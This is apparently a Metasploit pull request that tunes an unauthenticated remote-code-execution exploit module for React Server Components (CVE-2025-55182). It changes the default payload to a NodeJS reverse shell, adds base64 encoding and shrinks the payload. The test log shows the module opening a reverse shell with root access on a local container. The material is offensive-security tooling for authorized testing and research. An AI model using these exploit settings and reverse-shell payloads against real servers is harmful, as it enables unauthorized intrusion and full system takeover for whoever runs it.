### PR TITLE
Change react2shell default encoder and payload 

### DIFF
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -85,6 +85,6 @@ module Msf::Payload::NodeJS
   # @param [String] code the javascript code to run
   # @return [String] a command that invokes "node" and passes the code
   def nodejs_cmd(code)
-    "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
+    "node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
   end
 end

--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -85,6 +85,6 @@ module Msf::Payload::NodeJS
   # @param [String] code the javascript code to run
   # @return [String] a command that invokes "node" and passes the code
   def nodejs_cmd(code)
-    "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
+    "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
   end
 end

--- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
+++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
           ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
         ],
-        'Platform' => ['multi'],
+        'Platform' => %w[unix linux win],
         'Arch' => [ARCH_CMD],
         'Targets' => [
           [
@@ -40,8 +40,9 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['unix', 'linux'],
               'DefaultOptions' => {
-                'FETCH_COMMAND' => 'WGET'
+                'PAYLOAD' => 'cmd/unix/reverse_nodejs'
               }
+              # Tested with cmd/unix/reverse_nodejs
               # Tested with cmd/unix/reverse_bash
               # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
             }
@@ -55,7 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'Payload' => {
-          'BadChars' => '"'
+          'BadChars' => '"',
+          'Encoder' => 'cmd/base64'
         },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-12-03',

--- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
+++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
@@ -57,6 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Payload' => {
           'BadChars' => '"',
+          'Space' => 131068,
+          'DisableNops' => true,
           'Encoder' => 'cmd/base64'
         },
         'DefaultTarget' => 0,


### PR DESCRIPTION
This PR changes the default payload for the react2shell module to use a nodejs payload. This will help pro users as previously the module was defaulting to an `aarch64` payload and was not honoring the default value set for the `FETCH_COMMAND` datastore option. I believe this was what was requested as a temporary fix for these issues. 

The module was hitting a payload length limitation when using `cmd/unix/reverse_nodejs`. Due to the `badchar => '"'` the payload needs to be encoded. The EncoderType selected by default was `CmdPosixEcho`  which generates quite a large payload as each byte is sent as a `\x` prefixed hex encoded string: `/bin/echo -ne '\x6e\x6f\x64\x65...`. 

Explicitly setting the EncoderType to `CmdPosixBase64` is much more efficient: `echo bm9kZSAtZSAn...`. 

When first attempting to minimize the payload size the `#nodejs_cmd` method was changed to only encoding chars that are not whitespace or alpha numeric. This significantly reduced the size of the payload and should probably stay in this PR. 
## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use multi/http/react2shell_unauth_rce_cve_2025_55182`
- [ ] set `rhosts`, `rport`, `lhost`
- [ ] run the module
- [ ] **Verify** you get a session 


## Testing
```
msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/unix/reverse_nodejs
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set rport 3000
rport => 3000
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > options

Module options (exploit/multi/http/react2shell_unauth_rce_cve_2025_55182):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the React App
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_nodejs):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.
msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.16.199.1:4000
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (172.16.199.1:4000 -> 172.16.199.1:61025) at 2025-12-12 15:43:26 -0800
id

uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uname -a
Linux 22471a211b95 6.12.54-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Nov  4 21:39:03 UTC 2025 x86_64 Linux
^C
Abort session 1? [y/N]  yy

[*] 127.0.0.1 - Command shell session 1 closed.  Reason: User exit
```